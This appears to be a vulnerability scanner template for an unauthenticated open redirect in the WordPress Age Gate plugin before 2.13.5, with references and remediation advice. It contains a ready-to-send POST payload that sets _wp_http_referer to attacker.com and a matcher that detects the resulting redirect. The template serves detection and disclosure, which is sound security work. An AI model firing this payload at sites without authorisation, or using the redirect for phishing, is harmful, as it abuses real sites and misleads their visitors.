id: age-gate-open-redirect
info:
  name: Age Gate < 2.13.5 - Unauthenticated Open Redirect
  author:
  - l0ne1y
  tags:
  - wp-plugin
  - redirect
  - wordpress
  - wp
  - agegate
  - unauth
  description: |-
    Wordpress Plugin age-gate < 2.13.5 - Unauthenticated URL Redirect Vulnerability
    The plugin takes the _wp_http_referer parameter to redirect users after certain actions and after invalid or missing nonces, causing unvalidated open redirect issues.
  reference:
  - https://wpscan.com/vulnerability/10489
  - https://packetstormsecurity.com/files/160236/
  - https://wordpress.org/plugins/age-gate
  severity: low
  metadata:
    verified: true
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.com/zh-cn/install-plugins/

    Temporary fix:
    1. The code fixes the jump address and does not allow users to control variables.
    2. The redirect target address adopts a whitelist mapping mechanism and only redirects to legal URLs.
    3. Verify the target address of the jump reasonably and fully, and inform the user of the risk of jump if it is not your own address.
requests:
- matchers:
  - type: regex
    part: header
    regex:
    - (?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$
  path:
  - '{{BaseURL}}/wp-admin/admin-post.php'
  method: POST
  body: age_gate%5Bd%5D=10&age_gate%5Bm%5D=10&age_gate%5By%5D=1990&age_gate%5Bremember%5D=1&age_gate%5Bage%5D=TVRnPQ%3D%3D&action=age_gate_submit&age_gate%5Bnonce%5D=48f2b89fed&_wp_http_referer=https://attacker.com
  headers:
    Content-Type: application/x-www-form-urlencoded
